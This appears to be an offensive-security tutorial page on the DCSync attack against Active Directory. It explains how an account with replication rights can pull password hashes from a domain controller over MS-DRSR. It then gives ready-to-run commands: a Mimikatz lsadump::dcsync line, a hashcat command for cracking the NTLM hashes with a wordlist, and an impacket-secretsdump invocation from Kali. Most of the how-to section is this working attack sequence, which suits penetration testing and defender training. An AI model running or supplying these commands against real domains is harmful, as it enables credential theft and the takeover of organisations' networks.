💥 DcSync Attack
About The Attack​
DCSync is an attack where an attacker impersonates a Domain Controller (DC) and requests account password data via the Directory Replication Service Remote Protocol (MS-DRSR).
Normally, DCs replicate with each other using this protocol. But if you compromise an account with replication rights, you can abuse it to replicate secrets (hashes) from the real DC.
Gear Up (Prereqs)​
We need fllowing rights and info in order to perform such attack
- You need valid credentials (username + password/hash/ticket) of a domain account that has replication rights.
- The account must have one (or more) of the following rights in Active Directory:
- Replicating Directory Changes
- Replicating Directory Changes All
- Replicating Directory Changes in Filtered Set These permissions are normally assigned to Domain Admins, Enterprise Admins, Administrators, Domain Controllers
- The attacker must be able to reach the Domain Controller over, RPC, SMB, LDAP , As the replication protocol(MS-DRSR) runs over these 3 protocols.
How to Perform The Attack
From windows machine​
Using Mimikatz​
after you have access to a user with local admin rights use below command to get hash of other users
.\mimikatz.exe
lsadump::dcsync /user:domain\userName
Above command will fetch the NTLM hash of the user/Administrator if the attack is successful.
Crack the Hash​
hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
DCSync From kali​
impacket-secretsdump -just-dc-user user domain.com/Local_admin:"Password"@<DC-IP>
user: is the username for which you want to fetch hash.